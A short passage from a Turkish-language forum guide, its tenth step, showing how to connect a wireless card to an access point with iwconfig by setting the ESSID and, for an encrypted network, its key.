10. Adım: Erişim noktasına bağlanmak için, sudo iwconfig wlan0 essid <Hedef ESSID> komutunu yazın. Bu komut, ağ kartınızı hedef ağın ESSID'sine ayarlar. Eğer hedef ağ şifreliyse, sudo iwconfig wlan0 key <Hedef Şifre> komutunu yazın. Bu komut, ağ kartınızı hedef ağın şifresine ayarlar. Bağlantınızın başarılı olduğunu görmek için, sudo iwconfig wlan0 komutunu tekrar yazın. Bu komut, ağ kartınızın bağlı olduğu ağın bilgilerini gösterir.
 

Konuyu görüntüleyen kullanıcılar

Üst